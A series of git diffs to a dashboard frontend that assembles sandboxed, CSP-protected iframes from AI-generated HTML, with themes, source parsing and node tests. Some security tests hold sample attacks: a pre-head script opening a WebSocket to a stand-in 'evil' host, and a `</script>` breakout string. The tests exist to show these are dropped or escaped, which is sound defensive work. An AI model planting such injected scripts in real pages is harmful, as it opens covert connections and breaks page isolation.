+					var e = new Error('Unknown source "' + name + '" (declared: ' + known + ")");
 					e.code = "NotFound";
 					return reject(e);
 				}
@@ -264,7 +276,9 @@ export function buildSrcdoc(html, { dark = false, echartsSource = "" } = {}) {
 // Parent-side parse of the SAME #jarvis-sources block the runtime reads -
 // feeds the save dialog's detected-sources preview and the save payload.
 // String-based (no DOM) so it is testable and works on the raw html prop.
-// → [{source_name, tool, spec}]
+// Normalizes the same LLM dialects as the runtime (id/name for source_name,
+// jarvis__ tool prefix, args/args.spec for spec) so preview, save and render
+// always agree. → [{source_name, tool, spec}]
 export function parseSourcesBlock(html) {
 	const m =
 		/<script[^>]*\bid\s*=\s*["']jarvis-sources["'][^>]*>([\s\S]*?)<\/script>/i.exec(
@@ -274,7 +288,19 @@ export function parseSourcesBlock(html) {
 	try {
 		const parsed = JSON.parse(m[1])
 		const list = (parsed && parsed.sources) || []
-		return list.filter((s) => s && s.source_name)
+		return list
+			.map((s) => {
+				if (!s) return null
+				const source_name = s.source_name || s.id || s.name
+				if (!source_name) return null
+				const tool = String(s.tool || "").replace(/^jarvis__/, "")
+				let spec = s.spec
+				if (spec == null && s.args && typeof s.args === "object") {
+					spec = s.args.spec && typeof s.args.spec === "object" ? s.args.spec : s.args
+				}
+				return { source_name, tool, spec }
+			})
+			.filter(Boolean)
 	} catch (e) {
 		return []
 	}

--- a/frontend/src/lib/dashboardSrcdoc.js
+++ b/frontend/src/lib/dashboardSrcdoc.js
@@ -257,10 +257,32 @@ function setThemeAttr(src, theme) {
 // buildSrcdoc(html, {dark, echartsSource}) → the full srcdoc string.
 // Sync + pure: the caller dynamic-imports echarts.min.js?raw only when the
 // html references echarts, so the 1MB source never rides the main chunk.
-export function buildSrcdoc(html, { dark = false, echartsSource = "" } = {}) {
-	const theme = dark ? "dark" : "light"
+export function buildSrcdoc(
+	html,
+	{ dark = false, echartsSource = "", theme: themeSpec = null } = {},
+) {
+	// A named dashboard theme (from lib/dashboardThemes) owns the canvas look
+	// when provided: its CSS variables + base rules are injected BEFORE the
+	// dashboard's own styles (so those win conflicts), a JARVIS_THEME global
+	// exposes the chart palette, and data-theme follows the theme's own
+	// light/dark - independent of the app shell's mode. Without a theme the
+	// legacy dark flag drives data-theme only.
+	const theme = themeSpec ? (themeSpec.dark ? "dark" : "light") : dark ? "dark" : "light"
 	const src = String(html || "")
+	const themeBlock = themeSpec
+		? `<style id="jarvis-theme">${themeSpec.css}</style>` +
+			`<script>window.JARVIS_THEME=${escInline(
+				JSON.stringify({
+					name: themeSpec.key,
+					label: themeSpec.label,
+					dark: !!themeSpec.dark,
+					accent: themeSpec.accent,
+					palette: themeSpec.palette,
+				}),
+			)}<\/script>`
+		: ""
 	const scripts =
+		themeBlock +
 		(echartsSource ? `<script>${escInline(echartsSource)}<\/script>` : "") +
 		`<script>${escInline(RUNTIME_JS)}<\/script>`
 

--- a/frontend/src/lib/dashboardSrcdoc.js
+++ b/frontend/src/lib/dashboardSrcdoc.js
@@ -65,6 +65,13 @@ export const RUNTIME_JS = `(function () {
 				if (spec == null && s.args && typeof s.args === "object") {
 					spec = s.args.spec && typeof s.args.spec === "object" ? s.args.spec : s.args;
 				}
+				// double-wrap drift ({"spec":{"spec":{...}}}): unwrap lone spec keys
+				while (
+					spec && typeof spec === "object" && !Array.isArray(spec) &&
+					Object.keys(spec).length === 1 && spec.spec && typeof spec.spec === "object"
+				) {
+					spec = spec.spec;
+				}
 				sources[name] = { tool: tool, spec: spec };
 			}
 		} catch (e) {
@@ -337,6 +344,17 @@ export function parseSourcesBlock(html) {
 				let spec = s.spec
 				if (spec == null && s.args && typeof s.args === "object") {
 					spec = s.args.spec && typeof s.args.spec === "object" ? s.args.spec : s.args
+				}
+				// double-wrap drift ({"spec":{"spec":{...}}}): unwrap lone spec keys
+				while (
+					spec &&
+					typeof spec === "object" &&
+					!Array.isArray(spec) &&
+					Object.keys(spec).length === 1 &&
+					spec.spec &&
+					typeof spec.spec === "object"
+				) {
+					spec = spec.spec
 				}
 				return { source_name, tool, spec }
 			})

--- a/frontend/src/lib/dashboardSrcdoc.test.js
+++ b/frontend/src/lib/dashboardSrcdoc.test.js
@@ -1,0 +1,108 @@
+import { test } from "node:test"
+import assert from "node:assert/strict"
+import { buildSrcdoc, parseSourcesBlock, CSP_META, RUNTIME_JS } from "./dashboardSrcdoc.js"
+
+// A stable marker that only appears where the runtime was inlined.
+const RUNTIME_MARK = "window.jarvis = {"
+
+test("full document with <head>: injection lands right after the head tag", () => {
+  const out = buildSrcdoc("<!DOCTYPE html><html><head><title>t</title></head><body>USER</body></html>", {})
+  const head = out.indexOf("<head>")
+  assert.ok(head >= 0)
+  // CSP is the FIRST head child (immediately after the opening head tag)
+  assert.equal(out.indexOf(CSP_META), head + "<head>".length)
+  // runtime precedes the user's own head content and all user markup
+  assert.ok(out.indexOf(RUNTIME_MARK) < out.indexOf("<title>t</title>"))
+  assert.ok(out.indexOf(RUNTIME_MARK) < out.indexOf("USER"))
+})
+
+test("<html> but no <head>: a head is inserted after the html tag, CSP first", () => {
+  const out = buildSrcdoc('<html lang="en"><body>USER</body></html>', {})
+  const htmlTag = /<html[^>]*>/.exec(out)[0]
+  const afterHtml = out.indexOf(htmlTag) + htmlTag.length
+  assert.equal(out.indexOf("<head>"), afterHtml)
+  assert.equal(out.indexOf(CSP_META), afterHtml + "<head>".length)
+  assert.ok(out.indexOf("</head>") < out.indexOf("USER"))
+  assert.ok(out.indexOf(RUNTIME_MARK) < out.indexOf("USER"))
+})
+
+test("fragment: doctype stripped, skeleton wrap, charset present, CSP first", () => {
+  const out = buildSrcdoc("<!doctype html>\n<div>USER</div>", {})
+  assert.ok(out.startsWith("<!DOCTYPE html><html"))
+  // the leading user doctype was stripped (only our own remains)
+  assert.equal(out.match(/<!doctype/gi).length, 1)
+  const head = out.indexOf("<head>")
+  assert.equal(out.indexOf(CSP_META), head + "<head>".length)
+  // charset comes right after the CSP (fragment wrap only)
+  assert.equal(out.indexOf('<meta charset="utf-8">'), head + "<head>".length + CSP_META.length)
+  assert.ok(out.includes("<body><div>USER</div></body>"))
+  assert.ok(out.indexOf(RUNTIME_MARK) < out.indexOf("USER"))
+})
+
+test("charset is only added on the fragment wrap", () => {
+  const full = buildSrcdoc("<html><head></head><body></body></html>", {})
+  assert.ok(!full.includes('<meta charset="utf-8">'))
+})
+
+test("runtime script precedes user markup in all three cases", () => {
+  for (const html of [
+    "<html><head></head><body><p>USER</p></body></html>",
+    "<html><body><p>USER</p></body></html>",
+    "<p>USER</p>",
+  ]) {
+    const out = buildSrcdoc(html, {})
+    assert.ok(out.indexOf(RUNTIME_MARK) < out.indexOf("USER"), `runtime after markup for: ${html}`)
+  }
+})
+
+test("</script> in inlined sources is escaped so the wrapper cannot terminate early", () => {
+  const evil = 'console.log("</script><img src=x>")'
+  const out = buildSrcdoc("<div>ok</div>", { echartsSource: evil })
+  assert.ok(out.includes('console.log("<\\/script><img src=x>")'))
+  // the only raw </script> occurrences are our own wrapper closers (2 scripts)
+  assert.equal(out.match(/<\/script>/g).length, 2)
+})
+
+test("runtime itself carries no unescaped </script>", () => {
+  assert.ok(!/<\/script/i.test(RUNTIME_JS))
+})
+
+test("echarts toggle: absent by default, present (before the runtime) when passed", () => {
+  const without = buildSrcdoc("<div></div>", {})
+  assert.ok(!without.includes("ECHARTS_SRC"))
+  const withE = buildSrcdoc("<div></div>", { echartsSource: "/*ECHARTS_SRC*/" })
+  assert.ok(withE.includes("/*ECHARTS_SRC*/"))
+  assert.ok(withE.indexOf("/*ECHARTS_SRC*/") < withE.indexOf(RUNTIME_MARK))
+  assert.ok(withE.indexOf(CSP_META) < withE.indexOf("/*ECHARTS_SRC*/"))
+})
+
+test("theme attribute: set in all cases, replaced when already present", () => {
+  // fragment
+  assert.ok(buildSrcdoc("<p>x</p>", { dark: true }).includes('<html data-theme="dark">'))
+  assert.ok(buildSrcdoc("<p>x</p>", { dark: false }).includes('<html data-theme="light">'))
+  // full doc without the attr
+  const a = buildSrcdoc("<html><head></head><body></body></html>", { dark: true })
+  assert.ok(/<html[^>]*data-theme="dark"[^>]*>/.test(a))
+  // existing attr replaced, not duplicated
+  const b = buildSrcdoc('<html data-theme="light"><head></head><body></body></html>', { dark: true })
+  assert.ok(b.includes('data-theme="dark"'))
+  assert.ok(!b.includes('data-theme="light"'))
+  // html-no-head case too
+  const c = buildSrcdoc("<html><body></body></html>", { dark: true })
+  assert.ok(/<html[^>]*data-theme="dark"[^>]*>/.test(c))
+})
+
+test("parseSourcesBlock: reads the #jarvis-sources block; tolerates absence + bad JSON", () => {
+  const html =
+    '<div></div><script type="application/json" id="jarvis-sources">' +
+    '{"sources":[{"source_name":"overdue","tool":"query","spec":{"q":1}},{"tool":"query"}]}' +
+    "</script>"
+  const sources = parseSourcesBlock(html)
+  assert.equal(sources.length, 1) // the entry without source_name is dropped
+  assert.deepEqual(sources[0], { source_name: "overdue", tool: "query", spec: { q: 1 } })
+  assert.deepEqual(parseSourcesBlock("<div>none</div>"), [])
+  assert.deepEqual(
+    parseSourcesBlock('<script type="application/json" id="jarvis-sources">{oops</script>'),
+    [],
+  )
+})

--- a/frontend/src/lib/dashboardSrcdoc.test.js
+++ b/frontend/src/lib/dashboardSrcdoc.test.js
@@ -132,3 +132,24 @@ test("RUNTIME_JS: contains the same dialect normalization", () => {
   assert.ok(RUNTIME_JS.includes("jarvis__"))
   assert.ok(RUNTIME_JS.includes("s.args"))
 })
+
+test("buildSrcdoc: named theme injects vars + JARVIS_THEME and owns data-theme", async () => {
+  const { THEMES } = await import("./dashboardThemes.js")
+  const out = buildSrcdoc("<html><head></head><body><p>x</p></body></html>", {
+    theme: THEMES.jarvis,
+  })
+  assert.ok(out.includes('<style id="jarvis-theme">'))
+  assert.ok(out.includes("--jd-bg:"))
+  assert.ok(out.includes("window.JARVIS_THEME="))
+  assert.ok(out.includes('"name":"jarvis"'))
+  assert.ok(/<html[^>]*data-theme="light"/.test(out))
+  // theme style must precede the runtime so vars exist before user scripts
+  assert.ok(out.indexOf('id="jarvis-theme"') < out.indexOf("window.jarvis ="))
+  // a dark theme drives data-theme
+  const dark = buildSrcdoc("<p>x</p>", { theme: THEMES.graphite })
+  assert.ok(dark.includes('data-theme="dark"'))
+  // no theme → legacy dark flag behavior unchanged
+  const legacy = buildSrcdoc("<p>x</p>", { dark: true })
+  assert.ok(legacy.includes('data-theme="dark"'))
+  assert.ok(!legacy.includes("jarvis-theme"))
+})

--- a/frontend/src/lib/dashboardSrcdoc.test.js
+++ b/frontend/src/lib/dashboardSrcdoc.test.js
@@ -5,23 +5,28 @@ import { buildSrcdoc, parseSourcesBlock, CSP_META, RUNTIME_JS } from "./dashboar
 // A stable marker that only appears where the runtime was inlined.
 const RUNTIME_MARK = "window.jarvis = {"
 
-test("full document with <head>: injection lands right after the head tag", () => {
+// Every case is re-wrapped in OUR shell; author head/body inner is extracted,
+// the CSP meta is always the literal first head child, and author content only
+// ever lands inside <head>/<body> AFTER our runtime.
+test("full document with <head>: re-wrapped, CSP first, head/body inner preserved", () => {
   const out = buildSrcdoc("<!DOCTYPE html><html><head><title>t</title></head><body>USER</body></html>", {})
   const head = out.indexOf("<head>")
-  assert.ok(head >= 0)
+  assert.ok(out.startsWith("<!DOCTYPE html><html"))
   // CSP is the FIRST head child (immediately after the opening head tag)
   assert.equal(out.indexOf(CSP_META), head + "<head>".length)
-  // runtime precedes the user's own head content and all user markup
+  // author head + body content are preserved, but AFTER the runtime
+  assert.ok(out.includes("<title>t</title>"))
+  assert.ok(out.includes("<body>USER</body>"))
   assert.ok(out.indexOf(RUNTIME_MARK) < out.indexOf("<title>t</title>"))
   assert.ok(out.indexOf(RUNTIME_MARK) < out.indexOf("USER"))
 })
 
-test("<html> but no <head>: a head is inserted after the html tag, CSP first", () => {
+test("<html> but no <head>: re-wrapped, CSP first, body preserved", () => {
   const out = buildSrcdoc('<html lang="en"><body>USER</body></html>', {})
-  const htmlTag = /<html[^>]*>/.exec(out)[0]
-  const afterHtml = out.indexOf(htmlTag) + htmlTag.length
-  assert.equal(out.indexOf("<head>"), afterHtml)
-  assert.equal(out.indexOf(CSP_META), afterHtml + "<head>".length)
+  const head = out.indexOf("<head>")
+  assert.ok(out.startsWith("<!DOCTYPE html><html"))
+  assert.equal(out.indexOf(CSP_META), head + "<head>".length)
+  assert.ok(out.includes("<body>USER</body>"))
   assert.ok(out.indexOf("</head>") < out.indexOf("USER"))
   assert.ok(out.indexOf(RUNTIME_MARK) < out.indexOf("USER"))
 })
@@ -33,15 +38,33 @@ test("fragment: doctype stripped, skeleton wrap, charset present, CSP first", ()
   assert.equal(out.match(/<!doctype/gi).length, 1)
   const head = out.indexOf("<head>")
   assert.equal(out.indexOf(CSP_META), head + "<head>".length)
-  // charset comes right after the CSP (fragment wrap only)
+  // charset comes right after the CSP
   assert.equal(out.indexOf('<meta charset="utf-8">'), head + "<head>".length + CSP_META.length)
   assert.ok(out.includes("<body><div>USER</div></body>"))
   assert.ok(out.indexOf(RUNTIME_MARK) < out.indexOf("USER"))
 })
 
-test("charset is only added on the fragment wrap", () => {
-  const full = buildSrcdoc("<html><head></head><body></body></html>", {})
-  assert.ok(!full.includes('<meta charset="utf-8">'))
+test("charset is always present (fragment or full doc, since we always wrap)", () => {
+  assert.ok(buildSrcdoc("<html><head></head><body></body></html>", {}).includes('<meta charset="utf-8">'))
+  assert.ok(buildSrcdoc("<div>x</div>", {}).includes('<meta charset="utf-8">'))
+})
+
+test("SECURITY: a <script> before <head> is dropped, never runs pre-CSP", () => {
+  // The exploit: author markup before <head> executes during 'before head'
+  // parsing, BEFORE our injected CSP meta. We must drop it entirely.
+  const evil =
+    '<html><script>window.__PWNED=new WebSocket("wss://evil/x")</script>' +
+    "<head><title>ok</title></head><body>USER</body></html>"
+  const out = buildSrcdoc(evil, {})
+  const csp = out.indexOf(CSP_META)
+  // the malicious pre-head script must not survive at all
+  assert.ok(!out.includes("__PWNED"), "pre-head script must be dropped")
+  assert.ok(!out.includes('new WebSocket("wss://evil/x")'))
+  // and nothing whatsoever precedes the CSP except our own shell head
+  assert.ok(out.slice(0, csp).indexOf("<script") < 0, "no script before the CSP meta")
+  // legitimate head/body content survives (after the runtime)
+  assert.ok(out.includes("<title>ok</title>"))
+  assert.ok(out.includes("<body>USER</body>"))
 })
 
 test("runtime script precedes user markup in all three cases", () => {
@@ -161,4 +184,15 @@ test("parseSourcesBlock: unwraps double-nested spec ({spec:{spec:{...}}})", () =
     "</script>"
   const sources = parseSourcesBlock(html)
   assert.deepEqual(sources[0].spec, { from: "Sales Invoice" })
+})
+
+test("SECURITY: stale openclaw ws-client script is stripped, other scripts kept", () => {
+  const html =
+    "<html><head></head><body><div id=chart></div>" +
+    "<script>renderChart()</script>" +
+    '<script>const ws=new WebSocket("ws://"+location.host+"/__openclaw__/ws");</script>' +
+    "</body></html>"
+  const out = buildSrcdoc(html, {})
+  assert.ok(out.includes("renderChart()"), "legit script kept")
+  assert.ok(!out.includes("__openclaw__/ws"), "host ws-client stripped")
 })

--- a/frontend/src/lib/dashboardSrcdoc.test.js
+++ b/frontend/src/lib/dashboardSrcdoc.test.js
@@ -153,3 +153,12 @@ test("buildSrcdoc: named theme injects vars + JARVIS_THEME and owns data-theme",
   assert.ok(legacy.includes('data-theme="dark"'))
   assert.ok(!legacy.includes("jarvis-theme"))
 })
+
+test("parseSourcesBlock: unwraps double-nested spec ({spec:{spec:{...}}})", () => {
+  const html =
+    '<script type="application/json" id="jarvis-sources">' +
+    '{"sources":[{"source_name":"m","tool":"query","spec":{"spec":{"from":"Sales Invoice"}}}]}' +
+    "</script>"
+  const sources = parseSourcesBlock(html)
+  assert.deepEqual(sources[0].spec, { from: "Sales Invoice" })
+})

--- a/frontend/src/lib/dashboardSrcdoc.test.js
+++ b/frontend/src/lib/dashboardSrcdoc.test.js
@@ -106,3 +106,29 @@ test("parseSourcesBlock: reads the #jarvis-sources block; tolerates absence + ba
     [],
   )
 })
+
+test("parseSourcesBlock: normalizes the LLM tool-call dialect (id / jarvis__ prefix / args.spec)", () => {
+  const html =
+    '<script type="application/json" id="jarvis-sources">' +
+    '{"sources":[' +
+    '{"id":"monthly_sales","tool":"jarvis__query","refresh":"view","args":{"spec":{"from":"Sales Invoice"}}},' +
+    '{"name":"top5","tool":"jarvis__run_report","args":{"report_name":"Foo","filters":{"a":1}}}' +
+    "]}</script>"
+  const sources = parseSourcesBlock(html)
+  assert.equal(sources.length, 2)
+  assert.deepEqual(sources[0], {
+    source_name: "monthly_sales",
+    tool: "query",
+    spec: { from: "Sales Invoice" },
+  })
+  assert.deepEqual(sources[1], {
+    source_name: "top5",
+    tool: "run_report",
+    spec: { report_name: "Foo", filters: { a: 1 } },
+  })
+})
+
+test("RUNTIME_JS: contains the same dialect normalization", () => {
+  assert.ok(RUNTIME_JS.includes("jarvis__"))
+  assert.ok(RUNTIME_JS.includes("s.args"))
+})

--- a/frontend/src/lib/dashboardThemes.js
+++ b/frontend/src/lib/dashboardThemes.js
@@ -1,0 +1,111 @@
+// Named render themes for dashboard canvases. The shell (buildSrcdoc) injects
+// the selected theme as CSS variables + a small base stylesheet ahead of the
+// dashboard's own styles, so the SAME generated HTML re-skins when the user
+// switches themes: the skill instructs the agent to color everything with the
+// --jd-* variables instead of hardcoding.
+//
+// Keys are lowercase (API/theme picker); the DocType stores the capitalized
+// label ("Jarvis" | "Insight" | "Claude" | "Graphite") — use themeKey()/
+// themeLabel() to convert. "Jarvis" is the product default: the app's own
+// design language (design.md — gray-on-white, ink-gray scale, hairlines,
+// near-black accent) so an unprompted dashboard looks native. The agent only
+// deviates from the injected theme when the user explicitly asks about the
+// design; otherwise the standard applies.
+
+const VARS = (v) => `:root{
+--jd-bg:${v.bg};--jd-surface:${v.surface};--jd-ink:${v.ink};--jd-heading:${v.heading || v.ink};--jd-muted:${v.muted};
+--jd-line:${v.line};--jd-accent:${v.accent};--jd-radius:10px;--jd-shadow:${v.shadow};
+--jd-font:${v.font};--jd-font-display:${v.fontDisplay};
+}`
+
+// Modest base rules only — layout stays the dashboard's job; these make an
+// under-styled document look decent and re-skinnable. Injected BEFORE the
+// dashboard's own <style>, so its rules win any conflict.
+const BASE = `
+html,body{background:var(--jd-bg);color:var(--jd-ink);font-family:var(--jd-font);margin:0;}
+h1,h2,h3{font-family:var(--jd-font-display);color:var(--jd-heading,var(--jd-ink));}
+table{border-collapse:collapse;width:100%;}
+th{color:var(--jd-muted);font-weight:600;text-align:left;}
+th,td{padding:8px 12px;border-bottom:1px solid var(--jd-line);}
+section.slide{background:var(--jd-bg);}
+`
+
+const SANS = `InterVariable,Inter,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif`
+
+export const THEMES = {
+	jarvis: {
+		key: "jarvis",
+		label: "Jarvis",
+		dark: false,
+		accent: "#383838",
+		// Gray-anchored, muted series colors — hue stays informational, the
+		// near-black primary matches the app's solid-CTA gray (design.md §2.1).
+		palette: ["#383838", "#5d78d1", "#4c9a7a", "#d9a53f", "#c25d5d", "#8a7bb8", "#5a99ae", "#a0693f"],
+		css:
+			VARS({
+				bg: "#f8f8f8", surface: "#ffffff", ink: "#383838", heading: "#171717",
+				muted: "#7c7c7c", line: "#ededed", accent: "#383838",
+				shadow: "0 1px 2px rgba(0,0,0,.05)",
+				font: SANS, fontDisplay: SANS,
+			}) + BASE,
+	},
+	insight: {
+		key: "insight",
+		label: "Insight",
+		dark: false,
+		accent: "#2490ef",
+		palette: ["#2490ef", "#25b885", "#f5a623", "#e24c4c", "#9b59b6", "#17a2b8", "#fd7e14", "#5856d6"],
+		css:
+			VARS({
+				bg: "#f3f3f3", surface: "#ffffff", ink: "#1f272e", muted: "#6c7680",
+				line: "#e2e2e2", accent: "#2490ef",
+				shadow: "0 1px 2px rgba(25,39,52,.06)",
+				font: SANS, fontDisplay: SANS,
+			}) + BASE,
+	},
+	claude: {
+		key: "claude",
+		label: "Claude",
+		dark: false,
+		accent: "#d97757",
+		palette: ["#d97757", "#7d9b76", "#dfa32e", "#6a9bcc", "#b0603f", "#8a7bb8", "#5c8a72", "#c2542e"],
+		css:
+			VARS({
+				bg: "#faf9f5", surface: "#ffffff", ink: "#3d3929", muted: "#83827d",
+				line: "#e8e6dc", accent: "#d97757",
+				shadow: "0 1px 2px rgba(61,57,41,.06)",
+				font: SANS, fontDisplay: `Georgia,"Times New Roman",serif`,
+			}) + BASE,
+	},
+	graphite: {
+		key: "graphite",
+		label: "Graphite",
+		dark: true,
+		accent: "#8ab4f8",
+		palette: ["#8ab4f8", "#4ade80", "#fbbf24", "#f87171", "#c084fc", "#22d3ee", "#fb923c", "#a3e635"],
+		css:
+			VARS({
+				bg: "#191919", surface: "#222222", ink: "#ececec", muted: "#9a9a9a",
+				line: "#333333", accent: "#8ab4f8",
+				shadow: "none",
+				font: SANS, fontDisplay: SANS,
+			}) + BASE,
+	},
+}
+
+export const DEFAULT_THEME = "insight"
+
+export const THEME_OPTIONS = Object.values(THEMES).map((t) => ({
+	key: t.key,
+	label: t.label,
+}))
+
+// DocType stores the capitalized label; the SPA works in lowercase keys.
+export function themeKey(label) {
+	const k = String(label || "").toLowerCase()
+	return THEMES[k] ? k : DEFAULT_THEME
+}
+
+export function themeLabel(key) {
+	return (THEMES[themeKey(key)] || THEMES[DEFAULT_THEME]).label
+}

--- a/frontend/src/lib/dashboardThemes.js
+++ b/frontend/src/lib/dashboardThemes.js
@@ -30,7 +30,10 @@ th,td{padding:8px 12px;border-bottom:1px solid var(--jd-line);}
 section.slide{background:var(--jd-bg);}
 `
 
-const SANS = `InterVariable,Inter,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif`
+// System stack only: the sandbox's CSP is `font-src data:` with no network, so
+// a webfont (Inter) can't load inside the canvas - claiming it would silently
+// fall back anyway. The system sans matches design.md's own fallback chain.
+const SANS = `-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif`
 
 export const THEMES = {
 	jarvis: {

--- a/frontend/src/lib/dashboardThemes.js
+++ b/frontend/src/lib/dashboardThemes.js
@@ -93,7 +93,7 @@ export const THEMES = {
 	},
 }
 
-export const DEFAULT_THEME = "insight"
+export const DEFAULT_THEME = "jarvis"
 
 export const THEME_OPTIONS = Object.values(THEMES).map((t) => ({
 	key: t.key,

--- a/frontend/src/pages/dashboards/DashboardCanvas.vue
+++ b/frontend/src/pages/dashboards/DashboardCanvas.vue
@@ -161,10 +161,13 @@ function dataPayload(data) {
 async function handleData(d) {
 	let reply
 	try {
+		// call_tool dispatches kwargs: query takes its DSL object under the
+		// `spec` kwarg; get_list/run_report take the object AS their kwargs.
+		const args = d.tool === "query" ? { spec: d.spec } : d.spec
 		const env =
 			props.mode === "view"
 				? await runDashboardSource(props.dashboard && props.dashboard.name, d.name)
-				: await callDashboardTool(d.tool, d.spec)
+				: await callDashboardTool(d.tool, args)
 		if (env && env.ok) {
 			reply = { ok: true, rows: dataPayload(env.data) }
 		} else {

--- a/frontend/src/pages/dashboards/DashboardCanvas.vue
+++ b/frontend/src/pages/dashboards/DashboardCanvas.vue
@@ -1,17 +1,23 @@
 <template>
 	<div class="relative flex h-full min-h-0 w-full flex-col">
-		<!-- §3.8 empty state (builder only - the view page gates on its own load) -->
+		<!-- §3.8 empty state - builder: "ask in chat"; view: "this is empty" -->
 		<div
 			v-if="!html"
 			class="flex flex-1 flex-col items-center justify-center gap-3 px-8 text-center"
 		>
-			<template v-if="mode === 'builder'">
-				<FeatherIcon name="bar-chart-2" class="size-7.5 text-ink-gray-5" />
-				<div class="flex flex-col items-center gap-1">
-					<span class="text-lg font-medium text-ink-gray-8">Nothing on the canvas yet</span>
-					<span class="text-p-base text-ink-gray-6">Ask for a dashboard in the chat below.</span>
-				</div>
-			</template>
+			<FeatherIcon name="bar-chart-2" class="size-7.5 text-ink-gray-5" />
+			<div class="flex flex-col items-center gap-1">
+				<span class="text-lg font-medium text-ink-gray-8">
+					{{ mode === "builder" ? "Nothing on the canvas yet" : "This dashboard is empty" }}
+				</span>
+				<span class="text-p-base text-ink-gray-6">
+					{{
+						mode === "builder"
+							? "Ask for a dashboard in the chat below."
+							: "It has no saved content to show."
+					}}
+				</span>
+			</div>
 		</div>
 
 		<!-- §3.8 error + retry (srcdoc assembly / echarts chunk load failed) -->

--- a/frontend/src/pages/dashboards/DashboardCanvas.vue
+++ b/frontend/src/pages/dashboards/DashboardCanvas.vue
@@ -54,27 +54,29 @@
 // the SERVER-stored spec is authoritative and the frame's spec is ignored).
 // The srcdoc is assembled by lib/dashboardSrcdoc (CSP + bridge runtime); the
 // echarts source only loads (dynamic ?raw import, its own chunk) when the
-// html actually references echarts. Theme flips are relayed live over
-// postMessage instead of rebuilding the document.
+// html actually references echarts. The named dashboard theme (--jd-* vars)
+// owns the canvas look; switching it rebuilds the document.
 import { ref, watch, onMounted, onBeforeUnmount } from "vue"
 import { Button, ErrorMessage, FeatherIcon, LoadingIndicator } from "frappe-ui"
 import { buildSrcdoc, parseSourcesBlock } from "@/lib/dashboardSrcdoc"
+import { THEMES, DEFAULT_THEME, themeKey } from "@/lib/dashboardThemes"
 import { loadCaptureLib, downloadPng, downloadPdf } from "@/lib/dashboardExport"
 import { runDashboardSource, callDashboardTool } from "@/api/dashboards"
-import { useJarvisTheme } from "@/theme"
 
 const props = defineProps({
 	mode: { type: String, default: "builder" }, // "builder" | "view"
 	html: { type: String, default: "" },
 	dashboard: { type: Object, default: null }, // view mode: {name} at minimum
 	caps: { type: Object, default: () => ({}) },
+	// Named render theme (lib/dashboardThemes key or DocType label). The canvas
+	// look belongs to the dashboard, not the app shell - app dark mode does not
+	// restyle it, the picker does.
+	theme: { type: String, default: DEFAULT_THEME },
 })
 
 // sources: the parsed #jarvis-sources list (save-dialog preview + payload);
 // state: "empty" | "loading" | "ready" | "error" for hosts that care.
 const emit = defineEmits(["sources", "state"])
-
-const { effectiveDark } = useJarvisTheme()
 
 const frame = ref(null)
 const doc = ref("")
@@ -112,7 +114,10 @@ async function rebuild() {
 			const mod = await import("../../../node_modules/echarts/dist/echarts.min.js?raw")
 			echartsSource = (mod && mod.default) || ""
 		}
-		doc.value = buildSrcdoc(props.html, { dark: !!effectiveDark.value, echartsSource })
+		doc.value = buildSrcdoc(props.html, {
+			echartsSource,
+			theme: THEMES[themeKey(props.theme)],
+		})
 		// Safety valve: if the frame never posts ready (user script threw before
 		// our runtime's DOMContentLoaded, etc.) don't spin forever.
 		clearTimeout(readyTimer)
@@ -135,8 +140,12 @@ watch(
 	{ immediate: true },
 )
 
-// Live theme relay - the runtime flips data-theme + fires jarvis:theme inside.
-watch(effectiveDark, (dark) => postToFrame({ type: "theme", dark: !!dark }))
+// Theme switches rebuild the document (charts re-init against the new
+// palette) - a full reload is simpler and more reliable than live restyling.
+watch(
+	() => props.theme,
+	() => rebuild(),
+)
 
 // ── data bridge ──────────────────────────────────────────────────────────────
 // run_report results resolve inside the iframe as {columns, rows}; query/

--- a/frontend/src/pages/dashboards/DashboardCanvas.vue
+++ b/frontend/src/pages/dashboards/DashboardCanvas.vue
@@ -1,0 +1,248 @@
+<template>
+	<div class="relative flex h-full min-h-0 w-full flex-col">
+		<!-- §3.8 empty state (builder only - the view page gates on its own load) -->
+		<div
+			v-if="!html"
+			class="flex flex-1 flex-col items-center justify-center gap-3 px-8 text-center"
+		>
+			<template v-if="mode === 'builder'">
+				<FeatherIcon name="bar-chart-2" class="size-7.5 text-ink-gray-5" />
+				<div class="flex flex-col items-center gap-1">
+					<span class="text-lg font-medium text-ink-gray-8">Nothing on the canvas yet</span>
+					<span class="text-p-base text-ink-gray-6">Ask for a dashboard in the chat below.</span>
+				</div>
+			</template>
+		</div>
+
+		<!-- §3.8 error + retry (srcdoc assembly / echarts chunk load failed) -->
+		<div
+			v-else-if="buildError"
+			class="flex flex-1 flex-col items-center justify-center gap-3 px-8 text-center"
+		>
+			<ErrorMessage :message="buildError" />
+			<Button label="Retry" :loading="building" @click="rebuild" />
+		</div>
+
+		<template v-else>
+			<!-- sandbox: allow-scripts ONLY (no allow-same-origin, no allow-popups) -
+			     paired with the srcdoc CSP (no network, inline-only) the dashboard
+			     runs fully isolated; all data arrives over postMessage. -->
+			<iframe
+				ref="frame"
+				:srcdoc="doc"
+				sandbox="allow-scripts"
+				class="w-full border-0"
+				:class="mode === 'view' ? '' : 'min-h-0 flex-1'"
+				:style="mode === 'view' ? { height: frameH + 'px' } : null"
+				title="Dashboard canvas"
+			/>
+			<div
+				v-if="loading"
+				class="absolute inset-0 flex items-center justify-center bg-surface-white/60"
+			>
+				<LoadingIndicator class="size-5 text-ink-gray-5" />
+			</div>
+		</template>
+	</div>
+</template>
+
+<script setup>
+// DashboardCanvas - the sandboxed dashboard surface, shared by the builder
+// (mode="builder": fixed pane, sources executed ad-hoc via call_tool from the
+// spec the HTML itself declares) and the saved view page (mode="view": iframe
+// grows to its content, sources executed by name via run_dashboard_source -
+// the SERVER-stored spec is authoritative and the frame's spec is ignored).
+// The srcdoc is assembled by lib/dashboardSrcdoc (CSP + bridge runtime); the
+// echarts source only loads (dynamic ?raw import, its own chunk) when the
+// html actually references echarts. Theme flips are relayed live over
+// postMessage instead of rebuilding the document.
+import { ref, watch, onMounted, onBeforeUnmount } from "vue"
+import { Button, ErrorMessage, FeatherIcon, LoadingIndicator } from "frappe-ui"
+import { buildSrcdoc, parseSourcesBlock } from "@/lib/dashboardSrcdoc"
+import { loadCaptureLib, downloadPng, downloadPdf } from "@/lib/dashboardExport"
+import { runDashboardSource, callDashboardTool } from "@/api/dashboards"
+import { useJarvisTheme } from "@/theme"
+
